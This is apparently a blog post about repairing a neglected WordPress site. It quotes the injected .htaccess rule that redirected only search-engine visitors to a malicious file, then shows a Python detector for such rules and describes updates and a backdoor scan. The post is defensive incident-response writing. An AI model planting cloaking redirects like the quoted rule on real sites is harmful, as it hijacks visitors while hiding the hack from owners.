This particular website was on WordPress 3.6 and had not been updated in 8 or so years. The site ran smoothly up until today, when the customer noticed that if you Google the site and click the link, it actually brings you to a different site. This was a super sneaky hack: the admins would most likely not Google the site, but all the customers would, which makes it hard to detect. After a quick look in the .htaccess file I found the culprit.

RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ config-sample.php?$1 [L]
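
A check for this kind of rule, as an added example (not code from the original post): it walks an .htaccess file and flags any RewriteRule gated by RewriteCond tests of the User-Agent or Referer header against search-engine names, which is why only visitors arriving from a search result saw the redirect. The function name and sample text are constructed here; the sample combines the rule above with the stock WordPress rewrite block.

```python
import re

# Request attributes that differ between a search visitor and an admin typing the URL.
CLOAK_VARS = re.compile(r"%\{HTTP[_:](USER[_-]AGENT|REFERER)\}", re.I)
# Search-engine names the injected rule on this page keys on.
ENGINES = re.compile(r"google|yahoo|msn|aol|bing", re.I)

# Constructed sample: the injected rule from the post, then the stock WordPress block.
SAMPLE = r"""RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ config-sample.php?$1 [L]

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""


def find_cloaked_rewrites(text):
    """Return (line_no, rule, conditions) for each RewriteRule whose conditions
    test User-Agent or Referer for a search-engine name."""
    findings, pending = [], []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments do not break a Cond/Rule group
        parts = line.split(None, 3)
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append(parts)
        elif directive == "rewriterule":
            # RewriteCond lines apply only to the next RewriteRule, then reset.
            hits = [" ".join(p) for p in pending
                    if CLOAK_VARS.search(p[1]) and ENGINES.search(p[2])]
            if hits:
                findings.append((line_no, line, hits))
            pending = []
    return findings


if __name__ == "__main__":
    for line_no, rule, conds in find_cloaked_rewrites(SAMPLE):
        print(f"line {line_no}: {rule}  <- gated by {len(conds)} search-engine condition(s)")
```

The stock WordPress rules pass untouched because their conditions test `REQUEST_FILENAME`, not request headers.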

After this was fixed I wanted to update the site and run a scan to make sure there was nothing else on the site that could be causing issues. Unfortunately WordPress would not let me update because PHP was outdated, but updating the PHP version white-screened the site. This means the only way to update is to manually install the new files on top of the site so that all the old files get overwritten. After some complications with the host, I finally got the site updated and was greeted with a bunch of fatal errors. Luckily these were all from plugins, so I just renamed the plugin folder and then the site loaded with a bunch of errors. After this I just updated all the plugins, removed unused ones and reactivated them again. Now the site was updated and running smoothly. Next I ran a security scan; it was not very hopeful.

 

 

This scan shows 283 malicious files with backdoors to hackers. This plugin scans the website files against the official WordPress files and sees if there are any discrepancies, as well as checking for common hacks and misc. other things that could cause harm. After deleting all the files I ran the scan again and there was an abandoned plugin; I will recommend the client replace it, but it is not a security vulnerability at the current time. After that I ran some more scans from external sites to 100% verify that the site is clean, and all the tests came back clean and the site is now restored, updated and secure.
